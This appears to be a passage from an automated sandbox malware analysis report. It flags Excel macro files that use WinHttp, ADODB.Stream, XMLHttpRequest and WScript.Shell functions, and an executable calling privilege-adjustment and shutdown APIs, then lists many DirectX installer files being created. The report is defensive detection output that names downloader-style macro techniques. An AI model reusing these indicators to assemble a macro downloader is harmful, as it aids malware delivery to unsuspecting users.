                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Source: r4UZcR9I.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Source: EOWRVPQCCS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Source: r4UZcR9I.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Source: EOWRVPQCCS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Source: r4UZcR9I.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: EOWRVPQCCS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100263F ExitWindowsEx,2_2_0100263F
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010018B5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,2_2_010018B5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\Logs\DirectX.log
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\directx
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\directx\websetup
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\directx\websetup\SETFF3.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\directx\websetup\SET1013.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\filelist.dat
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4431D3.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4431D3.tmp\dxupdate.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\dxupdate.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4493D8.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4493D8.tmp\Apr2006_xinput_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_xinput_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS449A12.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS449A12.tmp\Apr2006_xinput_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_xinput_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS449FCF.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS449FCF.tmp\Aug2006_xinput_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2006_xinput_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44A55D.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44A55D.tmp\Aug2006_xinput_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2006_xinput_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44AABC.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44AABC.tmp\Dec2006_d3dx10_00_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_d3dx10_00_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44B115.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44B115.tmp\Dec2006_d3dx10_00_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_d3dx10_00_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44B6F1.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44B6F1.tmp\Apr2007_xinput_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_xinput_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44BC31.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44BC31.tmp\Apr2007_xinput_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_xinput_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44C633.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44C633.tmp\Feb2005_d3dx9_24_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2005_d3dx9_24_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44CEBF.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44CEBF.tmp\Apr2005_d3dx9_25_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2005_d3dx9_25_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44D7E6.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44D7E6.tmp\Jun2005_d3dx9_26_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2005_d3dx9_26_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44E014.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44E014.tmp\Aug2005_d3dx9_27_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2005_d3dx9_27_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44E851.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44E851.tmp\Dec2005_d3dx9_28_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2005_d3dx9_28_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44F0FC.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44F0FC.tmp\Feb2006_d3dx9_29_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2006_d3dx9_29_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44F9C6.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS44F9C6.tmp\Apr2006_d3dx9_30_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_d3dx9_30_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4504E2.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4504E2.tmp\Oct2006_d3dx9_31_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Oct2006_d3dx9_31_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS450DAC.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS450DAC.tmp\Dec2006_d3dx9_32_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_d3dx9_32_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS451741.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS451741.tmp\Apr2007_d3dx9_33_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_d3dx9_33_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS452153.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS452153.tmp\Apr2007_d3dx10_33_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_d3dx10_33_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4528C5.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4528C5.tmp\Jun2007_d3dx9_34_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_d3dx9_34_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4532A9.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4532A9.tmp\Jun2007_d3dx10_34_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_d3dx10_34_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4539AE.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4539AE.tmp\Aug2007_d3dx9_35_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2007_d3dx9_35_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4543EF.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4543EF.tmp\Aug2007_d3dx10_35_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2007_d3dx10_35_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS454B80.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS454B80.tmp\Nov2007_d3dx9_36_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2007_d3dx9_36_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4555B1.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4555B1.tmp\Nov2007_d3dx10_36_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2007_d3dx10_36_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS455D62.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS455D62.tmp\Mar2008_d3dx9_37_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2008_d3dx9_37_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4566A9.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4566A9.tmp\Mar2008_d3dx10_37_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2008_d3dx10_37_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS456E3B.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS456E3B.tmp\Jun2008_d3dx9_38_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2008_d3dx9_38_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4577C0.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4577C0.tmp\Jun2008_d3dx10_38_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2008_d3dx10_38_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS457F71.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS457F71.tmp\Aug2008_d3dx9_39_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2008_d3dx9_39_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS458925.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS458925.tmp\Aug2008_d3dx10_39_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2008_d3dx10_39_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS459098.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS459098.tmp\Nov2008_d3dx9_40_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2008_d3dx9_40_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS459A9A.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS459A9A.tmp\Nov2008_d3dx10_40_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2008_d3dx10_40_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45A25A.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45A25A.tmp\Mar2009_d3dx9_41_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2009_d3dx9_41_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45AC2E.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45AC2E.tmp\Mar2009_d3dx10_41_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2009_d3dx10_41_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45B47B.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45B47B.tmp\Aug2009_d3dx9_42_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_d3dx9_42_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45BBCE.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45BBCE.tmp\Aug2009_d3dx10_42_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_d3dx10_42_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45C17B.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45C17B.tmp\Aug2009_d3dx11_42_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_d3dx11_42_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45C6EA.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45C6EA.tmp\Aug2009_d3dcsx_42_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_d3dcsx_42_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45D83F.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45D83F.tmp\Aug2009_D3DCompiler_42_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_D3DCompiler_42_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45DFF0.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45DFF0.tmp\Jun2010_d3dx9_43_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2010_d3dx9_43_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45E7A1.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45E7A1.tmp\Jun2010_d3dx10_43_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2010_d3dx10_43_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45ED6D.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45ED6D.tmp\Jun2010_d3dx11_43_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2010_d3dx11_43_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45F2EB.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45F2EB.tmp\Jun2010_d3dcsx_43_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2010_d3dcsx_43_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45FA8D.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS45FA8D.tmp\Jun2010_D3DCompiler_43_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2010_D3DCompiler_43_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS46029B.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS46029B.tmp\Feb2005_d3dx9_24_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2005_d3dx9_24_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS460B75.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS460B75.tmp\Apr2005_d3dx9_25_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2005_d3dx9_25_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS461568.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS461568.tmp\Jun2005_d3dx9_26_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2005_d3dx9_26_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS461E41.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS461E41.tmp\Aug2005_d3dx9_27_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2005_d3dx9_27_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS462805.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS462805.tmp\Dec2005_d3dx9_28_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2005_d3dx9_28_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS463227.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS463227.tmp\Feb2006_d3dx9_29_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2006_d3dx9_29_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS463B2F.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS463B2F.tmp\Feb2006_xact_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2006_xact_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4640BD.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS4640BD.tmp\Feb2006_xact_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2006_xact_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS46467A.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS46467A.tmp\Apr2006_d3dx9_30_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_d3dx9_30_x64.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS465000.tmp
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\msdownld.tmp\AS465000.tmp\Apr2006_xact_x86.cab
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe File created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_xact_x86.cab
